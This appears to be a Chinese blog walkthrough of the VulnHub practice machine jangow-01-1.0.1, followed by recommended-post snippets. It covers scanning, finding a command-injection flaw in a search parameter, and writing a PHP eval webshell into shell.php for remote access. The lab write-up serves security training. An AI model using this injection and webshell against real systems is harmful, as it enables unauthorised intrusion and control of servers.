jangow-01-1.0.1靶机渗透测试

已于 2024-07-12 14:40:10 修改
阅读量173 收藏 5
点赞数 9
文章标签: mysql
于 2024-07-12 14:25:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140378229
版权

靶机地址:

https://vulnhub.com/entry/jangow-101,754/

一、靶机配置

1、开启靶机后按下shift键进入到以下界面

2、再次按下e键,进入到如下界面

3.将ro替换为rw signie init=/bin/bash

4、替换完毕后,按下Ctrl键+X键,进入如下页面。

5.输入vi /etc/network/interfaces编辑网卡信息,改完后按shift+?键才能输出保存,修改完成后重启靶机即可

二、信息收集

1、主机发现,确认靶机的IP地址

#使用命令
nmap 192.168.145.0/24

2、中间件、操作系统

3、端口扫描

#使用命令
nmap 192.168.145.157 -p-

4、目录扫描

#使用命令
dirsearch -u "http://192.168.145.157"

三、获取shell权限

1.访问http://192.168.145.157/网页,发现目录遍历漏洞

2.点击site文件夹,跳转到http://192.168.145.157/site/页面

3. 把网站的所有功能点都点一边,发现页面

4. 在buscar后面输入ls命令,发现命令执行漏洞

5. 尝试写入webshell:echo '<?php phpinfo();@eval($_POST["gh"]);?>' > shell.php

6.访问写入的shell.php文件,发现写入成功

7.使用蚁剑进行连接,获取到GetShell

果冻*果冻*
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2656
迟到的文章,就当库存发出来吧~
jangow-01-1.0.1
01-19
vulnhub的靶机jangow-01-1.0.1 Description Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-...
VulnHub之JANGOW-01-1.0.1渗透
m0_73481504的博客
03-06 376
1.了解命令执行漏洞2.一句话木马,反弹shell3.中国蚁剑的使用4.Ubuntu 4.4.0-31漏洞利用。
jangow-01-1.0.1 靶机渗透
braty_的博客
04-06 326
看了一些大佬的wp,发现该靶机只能用443端口,防火墙做了限制。
Vulnhub-jangow-01-1.0.1靶场练习笔记
qq_54060725的博客
04-17 147
searchsploit搜索ubuntu16.04。把45010.c的代码复制出来,使用蚁剑上传。主机开放21(ftp)和80端口。内核版本是ubuntu16.04。打开终端,查看系统信息进行提权。写入shell.php反弹nc。访问shell.php触发反弹。dirsearch爆破目录。利用echo写入一句话木马。切换完整的交互式bash。发现.backup文件。这里只能反弹443端口。nmap扫描主机端口。gcc编译eva.c。
jangow-01-1.0.1靶机
ybkj6666的博客
11-02 162
使用arp-scan 从网络接口配置生成地址,来查看ip输入命令:arp-scan -l输入命令:nmap -min-rate 10000 -p- 192.168.187.163可以看到开放2个端口输入命令:nmap -sU -min-rate 10000 -p- 192.168.187.163这里可以看到有一个80端口但是是关闭状态,那我们不用管它输入命令:nmap -sC -sT -sV -O -p 21,80 192.168.187.163输入命令:nmap --script=vuln -
渗透测试Jangow1.0.1--入门级
G208_522的博客
03-25 5672
渗透测试Jangow101(一) 一、环境搭建 1、靶机:ip:192.168.0.9 靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 2、攻击机:ip:192.168.0.11 3、如何搭建 下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox) 使用virtualbox打开后会显示靶机ip 二、信息收集 1、nmap扫描开放端口 nmap -sC -sV 192.168.0.9 -sV 扫描目
Vulnhub - JANGOW: 1.0.1
shuozhuqiu6452的博客
12-05 145
vulnhub - JANGOW: 1.0.1
【vulnhub--JANGOW: 1.0.1靶机练习】
qq_74240553的博客
01-24 882
将ova文件直接拖进vm中,如果有报错,重试一下就好,没有什么其他什么的修改网络模式为NAT,这样靶机和攻击机就可以是同一网段了设置好这些后,直接开机,开打查看攻击机ip攻击机ip为 192.168.47.156扫描网段结果知道靶机ip为??啊这么没有扫出来看了才知道,这里要用virtualbox,那就下载一个virtualbox下载地址:然后把网络模式调成桥接模式这样就可以还是在同一个网段了。
【Vulnhub靶场】JANGOW: 1.0.1
Nailaoyyds的博客
06-02 669
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
rocketmq-console-ng-1.0.1.jar
07-22
java -jar rocketmq-console-ng-1.0.1.jar 启动 ---当终端断了该服务就会停止 nohup java -jar rocketmq-console-ng-1.0.1.jar >>/soft/RocketMQ/rocketmqlogs/log.out 2>&1 & 后台启动 --当终端断了也不会停止服务
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
我的世界光影SEUS-Renewed-v1.0.1.zip
05-16
"SEUS-Renewed-v1.0.1.zip" 是一款专为《我的世界》设计的光影包,它基于经典的SEUS光影进行改进和优化,旨在提供更加美观、真实的视觉享受。 SEUS光影最初由Creeperman86开发,因其独特的视觉风格和高质量的光影...
web小项目-曼波生日录(Servlet+JSP+MySQL)
m0_75138009的博客
07-24 854
当记录条数过多时会自动出现滚轮,数据不会超出紫框。
Redis与MySQL数据一致性问题的策略模式及解决方案
qq_36451127的博客
07-24 2241
(1)实际开发中一般使用使用了缓存更新策略模式,此方案最大程度上保证了数据的一致性并且实现也最简单(2)无论是先操作数据库再删除缓存还是先删除缓存再操作数据库都有可能会出现删除缓存失败的情况,所以需要加入删除重试机制(3)如果想要Redis和Mysql的数据强一致性,可以考虑使用加锁的方式实现。
MySQL DBA 修炼之道》第四章 开发进阶
最新发布
Trishia的博客
07-25 585
博主学习《MySQL DBA 修炼之道》结合自身理解的总结。主要讲解了范式、反范式、慢SQL查询、事务和锁等。
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 813
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
测试环境搭建整套大数据系统(十七:mysql同步,字段类型映射错误问题)
weixin_43446246的博客
07-24 428
mysql表hive表其中 type是字符串类型,但是yarn上一直报错number这个类是往int类型转才会使用到的。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值